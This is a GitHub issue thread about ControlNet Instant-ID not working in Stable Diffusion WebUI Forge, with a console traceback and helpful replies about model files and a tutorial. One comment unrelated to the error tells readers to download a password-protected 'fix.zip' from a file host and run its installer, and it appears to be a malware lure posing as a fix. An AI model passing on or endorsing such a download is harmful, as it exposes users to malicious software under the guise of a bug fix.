### ISSUE TITLE
ControlNet Instant-ID Doesn't Work

### ISSUE THREAD

**Issue by Melyns** [lllyasviel/stable-diffusion-webui-forge#1513]
Hi,

ControlNet Instant-ID won't work no matter what i did/settings i chose. I reinstalled forge in a new directory just to test but still won't work, so i'm assuming there are bugs in the code.

The image generates fine (while ignoring controlnet) & no errors appear in the webui, however in the console i get this:

```
[Unload] Current free memory is 4024.81 MB ...
[Unload] Unload model JointTextEncoder
[Unload] Current free memory is 5791.31 MB ...
Memory cleanup has taken 0.48 seconds
*** Error running postprocess_batch_list: E:\AI\Forge\webui\extensions-builtin\sd_forge_controlnet\scripts\controlnet.py
    Traceback (most recent call last):
      File "E:\AI\Forge\webui\modules\scripts.py", line 916, in postprocess_batch_list
        script.postprocess_batch_list(p, pp, *script_args, **kwargs)
      File "E:\AI\Forge\system\python\lib\site-packages\torch\utils\_contextlib.py", line 116, in decorate_context
        return func(*args, **kwargs)
      File "E:\AI\Forge\webui\extensions-builtin\sd_forge_controlnet\scripts\controlnet.py", line 567, in postprocess_batch_list
        self.process_unit_after_every_sampling(p, unit, self.current_params[i], pp, *args, **kwargs)
    KeyError: 0

---
Total progress: 100%|██████████████████████████████████████████████████████████████████| 20/20 [00:06<00:00,  3.33it/s]
Total progress: 100%|██████████████████████████████████████████████████████████████████| 20/20 [00:06<00:00,  3.98it/s]
```

version: [f2.0.1v1.10.1-previous-409-gf7ab23b1](https://github.com/lllyasviel/stable-diffusion-webui-forge/commit/f7ab23b1cb5d2e17d33ecc8febe9313bf824d897) 
python: 3.10.6 
torch: 2.4.0+cu124 
xformers: N/A 
gradio: 4.40.0

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by altoiddealer** [comment]
Are you using API?

I just tested - no issues.

![Screenshot 2024-08-26 110805](https://github.com/user-attachments/assets/afef4f3f-a24f-49e5-9ea9-bd3ece3eee0d)

![Screenshot 2024-08-26 110840](https://github.com/user-attachments/assets/1abcb5fb-1435-405f-89e2-27da61df749d)

**Comment by Melyns** [comment]
I apologize, i just noticed that you have models downloaded `ip-adapter_instant_id_sdxl` & `control_instant_id_sdxl`. I did a google search & i'm wondering if these work with Forge? https://huggingface.co/h94/IP-Adapter/tree/main/sdxl_models

I thought that there was a script that downloads them for me like the preprocessors but guess i was wrong.

**Comment by altoiddealer** [comment]
This is the tutorial I had originally followed to get those up and running

https://github.com/Mikubill/sd-webui-controlnet/discussions/2589

Note that they do not explain this in the tutorial... I get the best results by:

- First using only the first ControlNet in my screenshot.
- Now, recycle the Seed (use the same Seed / generation for next generation)
- Enable the second ControlNet in my screenshot, but use the output from your first generation as the input image.
- What this will do is make the generated "mask" from the preprocessor actually be placed where the face is generating.

**Comment by Melyns** [comment]
Thanks a lot for your assistance!

**Comment by greek12man** [comment]
> Are you using API? If so, you could be using an invalid value type (Such as `control_mode` or `resize_mode` - these may need to be string values like "Balanced" and "Just Resize")
> 
> I just tested in the UI - no issues.
> 
> ![Screenshot 2024-08-26 110805](https://github.com/user-attachments/assets/afef4f3f-a24f-49e5-9ea9-bd3ece3eee0d)
> 
> ![Screenshot 2024-08-26 110840](https://github.com/user-attachments/assets/1abcb5fb-1435-405f-89e2-27da61df749d)

Thank you, your screenshot helped me to finally get instantID working on forge.
